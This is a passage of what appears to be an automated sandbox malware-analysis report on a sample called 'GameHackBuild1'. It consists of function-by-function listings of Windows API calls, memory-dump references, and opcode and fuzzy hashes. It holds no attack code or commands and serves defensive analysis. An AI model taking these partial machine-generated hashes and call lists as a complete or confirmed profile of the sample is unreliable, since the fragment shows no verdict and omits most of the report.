                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide__freea$AllocateHeap
                                      • String ID:
                                      • API String ID: 1414292761-0
                                      • Opcode ID: ffbf9e03b782bce37d562bcd76375288929517cd1db05701ecc759711f6bc20d
                                      • Instruction ID: 52411840a8bcfbb3d6b1bc54649e13b9811928e623948bb7b05bebdab6ff0575
                                      • Opcode Fuzzy Hash: ffbf9e03b782bce37d562bcd76375288929517cd1db05701ecc759711f6bc20d
                                      • Instruction Fuzzy Hash: DF51CE72610226EFEB258F68ED41EFB77AAEB60760F154238FC05D6150EB35DC4087A2

                                      Control-flow Graph

                                      (interactive graph not reproduced; the Executed/Not Executed colouring is not recoverable from the text. Basic blocks a099b0-a09b1e. Call sites: CreateFileW in a09a39-a09a57 and, together with GetLastError, in a09a7d-a09a9f; GetLastError in a09a59-a09a7b; SetFileTime in a09ac7-a09adb.)
                                      APIs
                                      • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,?,00000000,?,00000000,?,?,00A078AD,?,00000005,?,00000011), ref: 00A09A4C
                                      • GetLastError.KERNEL32(?,?,00A078AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00A09A59
                                      • CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,?,00000800,?,?,00A078AD,?,00000005,?), ref: 00A09A8E
                                      • GetLastError.KERNEL32(?,?,00A078AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00A09A96
                                      • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00A078AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00A09ADB
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: File$CreateErrorLast$Time
                                      • String ID:
                                      • API String ID: 1999340476-0
                                      • Opcode ID: 93e4f5bd84c2480caeacc319832dc0c5286cea8ebe57ef255b332ff837516dc4
                                      • Instruction ID: 0a984fafceb671a0f03e47184584c1fb14f2ff4df612e0ff23164a082bd94d0c
                                      • Opcode Fuzzy Hash: 93e4f5bd84c2480caeacc319832dc0c5286cea8ebe57ef255b332ff837516dc4
                                      • Instruction Fuzzy Hash: 04415A316487496FE730CB20EC05BDBBBD4BB05364F100719F5E4961D2D775A989CBA1

                                      Control-flow Graph

                                      (interactive graph not reproduced; the Executed/Not Executed colouring is not recoverable from the text. Basic blocks a1ac74-a1accc. Call sites: PeekMessageW in a1ac74-a1ac8d; GetMessageW in a1ac8f-a1aca3; IsDialogMessageW in a1aca5-a1acb2; TranslateMessage and DispatchMessageW in a1acb4-a1acc2.)
                                      APIs
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00A1AC85
                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00A1AC96
                                      • IsDialogMessageW.USER32(00010444,?), ref: 00A1ACAA
                                      • TranslateMessage.USER32(?), ref: 00A1ACB8
                                      • DispatchMessageW.USER32(?), ref: 00A1ACC2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: Message$DialogDispatchPeekTranslate
                                      • String ID:
                                      • API String ID: 1266772231-0
                                      • Opcode ID: f53dad40bd84ec54180918a1f9c4e42f64fc97a38bb9bf754a7891639e4bfd4f
                                      • Instruction ID: ddb3d226a0ec4d36ea3a3e8a27c44b66e3b9882f5a811e22ae5fdeabca6fffd1
                                      • Opcode Fuzzy Hash: f53dad40bd84ec54180918a1f9c4e42f64fc97a38bb9bf754a7891639e4bfd4f
                                      • Instruction Fuzzy Hash: F5F0177190222AAB8B20DBE2AC4CEEB7F7CEE052A17404415F909D2140EA68D846CBF1

                                      Control-flow Graph

                                      (interactive graph not reproduced; the Executed/Not Executed colouring is not recoverable from the text. Basic blocks a1a2c7-a1a31f. Call sites: GetClassNameW in a1a2c7-a1a2e6; FindWindowExW in a1a2ff-a1a30b; SHAutoComplete in a1a312-a1a315; block a1a2e8-a1a2fd calls a117ac.)
                                      APIs
                                      • GetClassNameW.USER32(?,?,00000050), ref: 00A1A2DE
                                      • SHAutoComplete.SHLWAPI(?,00000010), ref: 00A1A315
                                        • Part of subcall function 00A117AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,00A0BB05,00000000,.exe,?,?,00000800,?,?,00A185DF,?), ref: 00A117C2
                                      • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00A1A305
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AutoClassCompareCompleteFindNameStringWindow
                                      • String ID: EDIT
                                      • API String ID: 4243998846-3080729518
                                      • Opcode ID: 25e41870aa9d0de8c9b5651bd083fe3ce09ebfd715cfe2e7308c070635bd57d7
                                      • Instruction ID: db5eb33bd5c0cf4062000398afb84588794639674a8e5abc728652802705f1e4
                                      • Opcode Fuzzy Hash: 25e41870aa9d0de8c9b5651bd083fe3ce09ebfd715cfe2e7308c070635bd57d7
                                      • Instruction Fuzzy Hash: 29F0E236B0262877E7209B64AD09FDB776C9B46B40F090052FE04A6180D7A0AD82C6F6

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 00A10085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00A100A0
                                        • Part of subcall function 00A10085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00A0EB86,Crypt32.dll,00000000,00A0EC0A,?,?,00A0EBEC,?,?,?), ref: 00A100C2
                                      • OleInitialize.OLE32(00000000), ref: 00A1A34E
                                      • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00A1A385
                                      • SHGetMalloc.SHELL32(00A48430), ref: 00A1A38F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                      • String ID: riched20.dll
                                      • API String ID: 3498096277-3360196438
                                      • Opcode ID: 0d52dc6e9dc2957e265fa8365c6cfaac90ed828472226f46d9f48fe8779763f6
                                      • Instruction ID: 2ce9480c5242fa69eb8758995494d95d962e9b04b4ae305c6452264bce96f1af
                                      • Opcode Fuzzy Hash: 0d52dc6e9dc2957e265fa8365c6cfaac90ed828472226f46d9f48fe8779763f6
                                      • Instruction Fuzzy Hash: 9EF0FFB1D00209ABCB10EF99D949AEFFBFCEF95701F00415AF814E2240DBB856458BA1

                                      Control-flow Graph

                                      (interactive graph not reproduced; the Executed/Not Executed colouring is not recoverable from the text. Basic blocks a0984e-a098e2. Call sites: GetStdHandle in a0985c-a09864; ReadFile in a09867-a0987e; GetLastError in a098a8-a098b1 and a098c7-a098d0; block a09896-a098a0 calls a0984e, the function's own entry block.)
                                      APIs
                                      • GetStdHandle.KERNEL32(000000F6), ref: 00A0985E
                                      • ReadFile.KERNELBASE(?,?,00000001,?,00000000), ref: 00A09876
                                      • GetLastError.KERNEL32 ref: 00A098A8
                                      • GetLastError.KERNEL32 ref: 00A098C7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: ErrorLast$FileHandleRead
                                      • String ID:
                                      • API String ID: 2244327787-0
                                      • Opcode ID: 13ac140f1b61cbe4193fee98c5f199503d7997a1d24376e8dbcc54a82f3b0b25
                                      • Instruction ID: 3bd043d26964e2e47516417ae8c57986da1c2aa7fe58359b15786f352909c8cd
                                      • Opcode Fuzzy Hash: 13ac140f1b61cbe4193fee98c5f199503d7997a1d24376e8dbcc54a82f3b0b25
                                      • Instruction Fuzzy Hash: CD119A3190420CEBDF209B51E904AAB77A8EB47731F10C12AF82A857D2D7359E489F51

                                      Control-flow Graph

                                      (interactive graph not reproduced; the Executed/Not Executed colouring is not recoverable from the text. Basic blocks a2a4f4-a2a56e. Call sites: LoadLibraryExW in a2a515-a2a530 and, after GetLastError in a2a532-a2a53b, again in a2a53d-a2a548; FreeLibrary in a2a561-a2a562.)
                                      APIs
                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00A2388F,00000000,00000000,?,00A2A49B,00A2388F,00000000,00000000,00000000,?,00A2A698,00000006,FlsSetValue), ref: 00A2A526
                                      • GetLastError.KERNEL32(?,00A2A49B,00A2388F,00000000,00000000,00000000,?,00A2A698,00000006,FlsSetValue,00A37348,00A37350,00000000,00000364,?,00A29077), ref: 00A2A532
                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00A2A49B,00A2388F,00000000,00000000,00000000,?,00A2A698,00000006,FlsSetValue,00A37348,00A37350,00000000), ref: 00A2A540
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: LibraryLoad$ErrorLast
                                      • String ID:
                                      • API String ID: 3177248105-0
                                      • Opcode ID: a9d1f54caae2cc76f5f1ebb560a38e2f6db057f1a797e9ceb90989061b102ab4
                                      • Instruction ID: da321d5ad06b30e063de376211c05fdc4e2046df06f45485c617e94a72d1a120
                                      • Opcode Fuzzy Hash: a9d1f54caae2cc76f5f1ebb560a38e2f6db057f1a797e9ceb90989061b102ab4
                                      • Instruction Fuzzy Hash: AA012B33755232ABCB21CBACBC44A57BBA8AF65BA17240630FD0BD7140D735D901CAE1
                                      APIs
                                      • CreateThread.KERNELBASE(00000000,00010000,Function_000109D0,?,00000000,00000000), ref: 00A108AD
                                      • SetThreadPriority.KERNEL32(?,00000000), ref: 00A108F4
                                        • Part of subcall function 00A06E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00A06EAF
                                      Similarity
                                      • API ID: Thread$CreatePriority__vswprintf_c_l
                                      • String ID: CreateThread failed
                                      • API String ID: 2655393344-3849766595
                                      • Opcode ID: 19e7a2d0e0bbef027cdc4707dc9d607eff629b4c8ff700a298fc78db95691ce6
                                      • Instruction ID: 214ea097baa883b15e23eacb6ea4056c2bfec9dcc50d4a7a4683e647d3bd5ddc
                                      • Opcode Fuzzy Hash: 19e7a2d0e0bbef027cdc4707dc9d607eff629b4c8ff700a298fc78db95691ce6
                                      • Instruction Fuzzy Hash: 5101DBB52443057FD6249F54FD41FA67398EB41715F10053DFA4696181CEF168C19664
                                      APIs
                                      • GetStdHandle.KERNEL32(000000F5,?,00000001,?,?,00A0CC94,00000001,?,?,?,00000000,00A14ECD,?,?,?), ref: 00A09F4C
                                      • WriteFile.KERNEL32(?,?,?,00000000,00000000,?,?,00000000,00A14ECD,?,?,?,?,?,00A14972,?), ref: 00A09F8E
                                      • WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000001,?,?,00A0CC94,00000001,?,?), ref: 00A09FB8
                                      Similarity
                                      • API ID: FileWrite$Handle
                                      • String ID:
                                      • API String ID: 4209713984-0
                                      • Opcode ID: 10c85c067c13c17009ad961a23d614f8f32a222abd25c12fec2f271bed1c55f8
                                      • Instruction ID: 25d7c6e49fbb6bffa6999f12a476a96f3576a043cd64b88b3166e2fd68d32254
                                      • Opcode Fuzzy Hash: 10c85c067c13c17009ad961a23d614f8f32a222abd25c12fec2f271bed1c55f8
                                      • Instruction Fuzzy Hash: 5531057160830A9BDF148F14EE48B6BBBA8EB90710F04461CF945DB1C2C775DD49CBA2
                                      APIs
                                      • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00A0A113,?,00000001,00000000,?,?), ref: 00A0A22E
                                      • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00A0A113,?,00000001,00000000,?,?), ref: 00A0A261
                                      • GetLastError.KERNEL32(?,?,?,?,00A0A113,?,00000001,00000000,?,?), ref: 00A0A27E
                                      Similarity
                                      • API ID: CreateDirectory$ErrorLast
                                      • String ID:
                                      • API String ID: 2485089472-0
                                      • Opcode ID: 957dc59406c0da72c948c751a3e29aaa97f605f402e0770a1ffd4ad8e59caab3
                                      • Instruction ID: 52a2e419de6535defaf63ab0b90555f06dcda92353ae0039c31e3f8cfc933148
                                      • Opcode Fuzzy Hash: 957dc59406c0da72c948c751a3e29aaa97f605f402e0770a1ffd4ad8e59caab3
                                      • Instruction Fuzzy Hash: BF01DE3254031C66DF32ABA46D46BEE7358AF2F781F044461F901DA0E1CB66CA8186B3
                                      APIs
                                      • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00A2B019
                                      Similarity
                                      • API ID: Info
                                      • String ID:
                                      • API String ID: 1807457897-3916222277
                                      • Opcode ID: a8d51596b705aadeb7e0b5c4a88c36c90f3ad5d7989b10f360180f12c5b29d47
                                      • Instruction ID: 13ac4f04e5aa71d21e4c639c1e98ad5b49bea67b48bcbfd0cf4acf9d1ff3e654
                                      • Opcode Fuzzy Hash: a8d51596b705aadeb7e0b5c4a88c36c90f3ad5d7989b10f360180f12c5b29d47
                                      • Instruction Fuzzy Hash: EE4125B050826C9BDF228B289C94AE6BBB9EB05304F1405FCE59A87142D335AA55CF30
                                      APIs
                                      • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,3FE85006,00000001,?,000000FF), ref: 00A2A79D
                                      Similarity
                                      • API ID: String
                                      • String ID: LCMapStringEx
                                      • API String ID: 2568140703-3893581201
                                      • Opcode ID: a8d6cb8055dc1377fb0738052def5dfb748c5979012fdc8cf20c7ddf32e1d93f
                                      • Instruction ID: 46b72ff1c3233fb273e061679d3376a67ba12ec37d3e49055febcb167e13e71e
                                      • Opcode Fuzzy Hash: a8d6cb8055dc1377fb0738052def5dfb748c5979012fdc8cf20c7ddf32e1d93f
                                      • Instruction Fuzzy Hash: 1201257250421CBBCF12AFA4ED02DEE3FA6FF28710F004564FE1466160CA768931EB91
                                      APIs
                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00A29D2F), ref: 00A2A715
                                      Strings
                                      • InitializeCriticalSectionEx, xrefs: 00A2A6E5
                                      Similarity
                                      • API ID: CountCriticalInitializeSectionSpin
                                      • String ID: InitializeCriticalSectionEx
                                      • API String ID: 2593887523-3084827643
                                      • Opcode ID: 78fabd00e15ed10a6e1d5c68539f483ce1e7dbf8f72a930ec24aa947ffa65422
                                      • Instruction ID: 6736695ffba2fd3081b7a0019ad882fa85b261fc5d4085771758450c91fbecd2
                                      • Opcode Fuzzy Hash: 78fabd00e15ed10a6e1d5c68539f483ce1e7dbf8f72a930ec24aa947ffa65422
                                      • Instruction Fuzzy Hash: 60F0BE3164521CBBCF11AFA8DC06CAE7FA1FF24720F004564FC095A260DB718A11EB91
                                      APIs
                                      Similarity
                                      • API ID: Alloc
                                      • String ID: FlsAlloc
                                      • API String ID: 2773662609-671089009
                                      • Opcode ID: 83beab43f9567c0b79b74de69742332fc354087bf05665b5e5831308c682ae0a
                                      • Instruction ID: cb80cf8a0f398e0baa515df8f26875ab265e1f992d253773fa2e93d5c93cce16
                                      • Opcode Fuzzy Hash: 83beab43f9567c0b79b74de69742332fc354087bf05665b5e5831308c682ae0a
                                      • Instruction Fuzzy Hash: 3BE0E571B4922C7B9624EBA8AC069EEBBA5EB35710F410565FC055B240DE704E01A6D6
                                      APIs
                                      • try_get_function.LIBVCRUNTIME ref: 00A232AF
                                      Similarity
                                      • API ID: try_get_function
                                      • String ID: FlsAlloc
                                      • API String ID: 2742660187-671089009
                                      • Opcode ID: 2ea0f46fb3edbbf2caa18647a772f2007d3fb4688742404b8d64468205626c79
                                      • Instruction ID: df2d41d916fc31e0d7a389db01cb230e496e54b146e580c79fd662fcc7e5eefa
                                      • Opcode Fuzzy Hash: 2ea0f46fb3edbbf2caa18647a772f2007d3fb4688742404b8d64468205626c79
                                      • Instruction Fuzzy Hash: B4D02B23B807347B8D1433EC7C039FE7E449702FB5F490A62FE081A1428765455002C5
                                      APIs
                                        • Part of subcall function 00A2AF1B: GetOEMCP.KERNEL32(00000000,?,?,00A2B1A5,?), ref: 00A2AF46
                                      • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00A2B1EA,?,00000000), ref: 00A2B3C4
                                      • GetCPInfo.KERNEL32(00000000,00A2B1EA,?,?,?,00A2B1EA,?,00000000), ref: 00A2B3D7
                                      Similarity
                                      • API ID: CodeInfoPageValid
                                      • String ID:
                                      • API String ID: 546120528-0
                                      • Opcode ID: 6aaf8c443bf8cc93a39dc0bc20d95986bfbae8caf7a5d09263852d32361cf1fd
                                      • Instruction ID: 12528e20a37d03badb1ea559e4614219aafac697dcf6066c816cfdb5f859efb4
                                      • Opcode Fuzzy Hash: 6aaf8c443bf8cc93a39dc0bc20d95986bfbae8caf7a5d09263852d32361cf1fd
                                      • Instruction Fuzzy Hash: EC513670D102259FDB24EF79E8C16BABBF5EF51310F18407EE0968B292D7359542CBA0
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00A01385
                                        • Part of subcall function 00A06057: __EH_prolog.LIBCMT ref: 00A0605C
                                        • Part of subcall function 00A0C827: __EH_prolog.LIBCMT ref: 00A0C82C
                                        • Part of subcall function 00A0C827: new.LIBCMT ref: 00A0C86F
                                        • Part of subcall function 00A0C827: new.LIBCMT ref: 00A0C893
                                      • new.LIBCMT ref: 00A013FE
                                        • Part of subcall function 00A0B07D: __EH_prolog.LIBCMT ref: 00A0B082
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID:
                                      • API String ID: 3519838083-0
                                      • Opcode ID: 9cd748dbc47ef157b9faa089d527a42cd4319fdcf5de2e4c2193bbe0604b7979
                                      • Instruction ID: e1ae29847800a2ceb2a50e35dfe01310fbbf3ad1c8a0158efd34b57103f87a35
                                      • Opcode Fuzzy Hash: 9cd748dbc47ef157b9faa089d527a42cd4319fdcf5de2e4c2193bbe0604b7979
                                      • Instruction Fuzzy Hash: 884134B0805B449EE724DF7989859E7FBE5FF18300F404A2ED6EE83282DB326554CB11
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00A01385
                                        • Part of subcall function 00A06057: __EH_prolog.LIBCMT ref: 00A0605C
                                        • Part of subcall function 00A0C827: __EH_prolog.LIBCMT ref: 00A0C82C
                                        • Part of subcall function 00A0C827: new.LIBCMT ref: 00A0C86F
                                        • Part of subcall function 00A0C827: new.LIBCMT ref: 00A0C893
                                      • new.LIBCMT ref: 00A013FE
                                        • Part of subcall function 00A0B07D: __EH_prolog.LIBCMT ref: 00A0B082
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID:
                                      • API String ID: 3519838083-0
                                      • Opcode ID: f9ace9bcb0fc48631f61a199bab80a7ce3d7190df4ab72fb8bd3a1935f28f935
                                      • Instruction ID: 8d4f2383f17a26bfd3a87a643389d4f9bb6f9847f8b1e8ca702de21d5680fb2f
                                      • Opcode Fuzzy Hash: f9ace9bcb0fc48631f61a199bab80a7ce3d7190df4ab72fb8bd3a1935f28f935
                                      • Instruction Fuzzy Hash: 424123B0805B449EE724DF798985AE7FBE5FF18300F504A2ED5EE83282DB326554CB11
                                      APIs
                                        • Part of subcall function 00A28FA5: GetLastError.KERNEL32(?,00A40F50,00A23E14,00A40F50,?,?,00A2388F,?,?,00A40F50), ref: 00A28FA9
                                        • Part of subcall function 00A28FA5: _free.LIBCMT ref: 00A28FDC
                                        • Part of subcall function 00A28FA5: SetLastError.KERNEL32(00000000,?,00A40F50), ref: 00A2901D
                                        • Part of subcall function 00A28FA5: _abort.LIBCMT ref: 00A29023
                                        • Part of subcall function 00A2B2AE: _abort.LIBCMT ref: 00A2B2E0
                                        • Part of subcall function 00A2B2AE: _free.LIBCMT ref: 00A2B314
                                        • Part of subcall function 00A2AF1B: GetOEMCP.KERNEL32(00000000,?,?,00A2B1A5,?), ref: 00A2AF46
                                      • _free.LIBCMT ref: 00A2B200
                                      • _free.LIBCMT ref: 00A2B236
                                      Similarity
                                      • API ID: _free$ErrorLast_abort
                                      • String ID:
                                      • API String ID: 2991157371-0
                                      • Opcode ID: f312991ec7c073363de766012c092ab5283ef866b83994147a555cddb15495ed
                                      • Instruction ID: 0cbde7c79f2b6eef8ca7984d10c532671340fd470090a179c8a01d938cdfb617
                                      • Opcode Fuzzy Hash: f312991ec7c073363de766012c092ab5283ef866b83994147a555cddb15495ed
                                      • Instruction Fuzzy Hash: DA31D131900228EFDB10EFADE941BADB7E1EF40320F2541B9F4149B291EB759D41CB60
                                      APIs
                                      • CreateFileW.KERNELBASE(?,00000000,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00A09EDC,?,?,00A07867), ref: 00A097A6
                                      • CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00A09EDC,?,?,00A07867), ref: 00A097DB
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID:
                                      • API String ID: 823142352-0
                                      • Opcode ID: b5c7b9d27e8f029e794efc759c4853d8515b2c6366efc39a9b8976350698640e
                                      • Instruction ID: d10bbac5e9246a49af27f27e8e8944ba14363c4748ceab4dfbca68f25036e942
                                      • Opcode Fuzzy Hash: b5c7b9d27e8f029e794efc759c4853d8515b2c6366efc39a9b8976350698640e
                                      • Instruction Fuzzy Hash: 002137B201474CAFE7308F64EC85BA7B7E8EB49764F00492DF5E5821D2C374AC858B21
                                      APIs
                                      • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00A07547,?,?,?,?), ref: 00A09D7C
                                      • SetFileTime.KERNELBASE(?,?,?,?), ref: 00A09E2C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                       • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: File$BuffersFlushTime
                                      • String ID:
                                      • API String ID: 1392018926-0
                                      • Opcode ID: ef493f2144099f63030ff26e0fd24a27c33ea1215ac1e63ac9a41eb1e4353697
                                      • Instruction ID: 9d67a133bda2562ec4552041cc765189c5fc52d932c5235dac4dce9c7b909a10
                                      • Opcode Fuzzy Hash: ef493f2144099f63030ff26e0fd24a27c33ea1215ac1e63ac9a41eb1e4353697
                                      • Instruction Fuzzy Hash: 1C21E73118824AABC714DF24D851EABBBE4AF96708F04081DF4D1C7182D329DE4CDB51
                                      APIs
                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00A2A4B8
                                      • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00A2A4C5
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                       • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AddressProc__crt_fast_encode_pointer
                                      • String ID:
                                      • API String ID: 2279764990-0
                                      • Opcode ID: a4e7be2457b060c3867a3cfa7b31a185e65518b5009c7355c750feaa6dbbd89c
                                      • Instruction ID: 7f0b19c3159916c068b1f656e97a914a9410070f3ed27611c2a05ecc33a7af61
                                      • Opcode Fuzzy Hash: a4e7be2457b060c3867a3cfa7b31a185e65518b5009c7355c750feaa6dbbd89c
                                      • Instruction Fuzzy Hash: 91110A33A016319F9F25EF6CFC4589A73A5AB903207164230FD15EB244DB70DC42C6D2
                                      APIs
                                      • SetFilePointer.KERNELBASE(?,?,?,?,-00001964,?,00000800,-00001964,00A09B35,?,?,00000000,?,?,00A08D9C,?), ref: 00A09BC0
